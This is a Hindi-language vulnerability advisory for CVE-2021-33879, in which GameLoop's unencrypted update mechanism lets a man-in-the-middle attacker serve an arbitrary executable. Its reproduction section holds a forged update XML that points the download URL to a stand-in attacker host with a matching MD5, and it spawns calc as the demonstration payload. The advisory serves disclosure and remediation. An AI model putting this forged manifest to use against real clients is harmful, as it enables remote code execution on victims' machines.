
GameLoop अपडेट MITM
CVEID: CVE-2021-33879
प्रभावित उत्पाद(ों) और संस्करण(ों) का नाम: GameLoop (4.1.21.90 से पहले के सभी संस्करण)
भेद्यता प्रकार: CWE-494: अखंडता जांच के बिना कोड का डाउनलोड
सारांश
GameLoop Tencent द्वारा विकसित एक Android एमुलेटर है। इसमें एक अपडेट तंत्र है जो एन्क्रिप्टेड या प्रमाणित नहीं है (MD5 हैश के अलावा, जिसे इस शोषण में हमलावर नियंत्रित कर सकता है), जिससे MITM स्थिति में हमलावर इंटरसेप्ट कर सकता है और अपने स्वयं के अपडेट पैकेज भेज सकता है जो पीड़ित मशीन पर निष्पादित होंगे।
विवरण
Tencent GameLoop 4.1.21.90 से पहले अपडेट को असुरक्षित HTTP कनेक्शन पर डाउनलोड करता था। MITM स्थिति में एक दुर्भावनापूर्ण हमलावर एक अपडेट पैकेज का वर्णन करने वाले XML दस्तावेज़ की सामग्री को गलत साबित कर सकता था, डाउनलोड URL को एक मनमाने Windows निष्पादन योग्य की ओर इंगित करने वाले URL से बदल सकता था। चूँकि एकमात्र अखंडता जांच डाउनलोड की गई फ़ाइल के MD5 चेकसम की XML दस्तावेज़ में मौजूद चेकसम से तुलना होगी, इसलिए डाउनलोड किया गया निष्पादन योग्य तब पीड़ित की मशीन पर निष्पादित होगा।
पुनरुत्पादन
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
<GlobalConfig>
<Item name="UpdateEnable" Value="1" />
</GlobalConfig>
<UpdatePolicy>
<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
<Condition Method="Or">
<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
</Condition>
</PolicyItem>
</UpdatePolicy>
<UpdateOperation>
<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
</OperItem>
</UpdateOperation>
</UpdateConfig>


उपाय
GameLoop का एक नया संस्करण स्थापित करें।